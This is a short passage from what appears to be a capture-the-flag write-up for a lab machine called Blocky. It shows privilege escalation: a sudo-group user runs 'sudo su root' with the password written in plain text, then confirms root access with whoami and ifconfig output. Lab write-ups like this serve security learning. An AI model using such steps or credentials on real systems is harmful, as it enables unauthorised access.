sudo


The notch user is part of the sudo group as enumerated by PEAS This would literally mean that I am the root user

notch@blocky:/dev/shm$ sudo su root
[sudo] password for notch: 8YsqfCTnvxAUeduzjNSXe22
root@blocky:/dev/shm# whoami
root
root@blocky:/dev/shm# hostname
Blocky
root@blocky:/dev/shm# ifconfig
ens160    link encap:Ethernet  HWaddr 00:50:56:b9:eb:6e  
          inet addr:10.10.10.37  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:eb6e/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:eb6e/64 Scope:Link
          up broadcast running multicast  mtu:1500  Metric:1
          rx packets:4858447 errors:0 dropped:63 overruns:0 frame:0
          tx packets:4491445 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:830144232 (830.1 MB)  TX bytes:2159211659 (2.1 GB)
 
lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          up loopback running  mtu:65536  Metric:1
          rx packets:42262 errors:0 dropped:0 overruns:0 frame:0
          tx packets:42262 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          rx bytes:3252796 (3.2 MB)  TX bytes:3252796 (3.2 MB)

System Level Compromise